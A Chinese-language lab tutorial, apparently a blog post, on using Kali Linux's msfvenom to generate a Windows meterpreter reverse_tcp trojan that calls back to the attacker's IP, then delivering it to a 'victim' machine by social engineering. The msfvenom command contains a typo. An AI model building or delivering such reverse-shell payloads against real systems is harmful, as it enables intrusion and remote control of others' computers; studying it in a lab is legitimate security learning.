网络安全与网站安全及计算机安全:如何使用Kali Linux进行Windows计算机操作系统安全演练
一、课前声明
1、本分享仅做学习交流,请自觉遵守法律法规!
2、搜索:Kali与编程,学习更多网络技术干货!
二、资源装备
1.安装好 Win7的虚拟机一台
2.整装待发的小白一个。
3.安装好的Kali Linux虚拟机一台。
三、战略安排
3.1 将受害者主机(Windows7)跟主机(Kali Linux)的网络模式全部设置为NAT模式,如下图所示。
步骤:打开虚拟机的设置/选择网络适配器/选择NAT模式。
3.2 利用kali linux的相关工具(msfvenom)生成对应的木码文件,如下图所示。
步骤1:msfvenom工具的参数介绍
-p, –payload < payload> 指定需要使用的payload荷载。也可以使用自定义payload,几乎是支持全平台的
-o, –out < path> 指定创建好的payload的存放位置。
-h, –help 查看帮助选项。
步骤2:msfvenom工具生成对应的木码文件举例,如下图所示。
步骤3:查看Kali Linux主机的主机IP地址,如下图所示。
命令:ifconfig
步骤4:利用msfvenom工具生成对应的木码文件,如下图所示。
命令:msfvenom -p 指定需要使用的payload载荷 lhost=Kali主机IP -f exe -o 生成木码文件的保存位置
例子:msfVenom -p windows/meterpreter/reverse_tcplhost=192.168.78.144 -f exe -o /root/hk.exe
步骤5:msfvenom工具生成木码文件对应的命令运行结果如下图所示。
Saved as:生成的木码文件保存路径。
步骤6:在已知的木码文件保存路径目录下查找对应的木码文件是否已经生成,如下图所示,木码文件已经存在(这里使用图形化文件管理系统来查看,你也可以利用ls命令查看对应路径下面是否已经生成对应的木码文件)。
3.3 利用一定的社会工程学方法将生成的木码文件发送到目标受害者主机,并且在受害者主机进行运行(对应的社会工程学知识请持续关注本号,后续讲解)
辛苦原创,关注我,私信我,欢迎与我学习交流!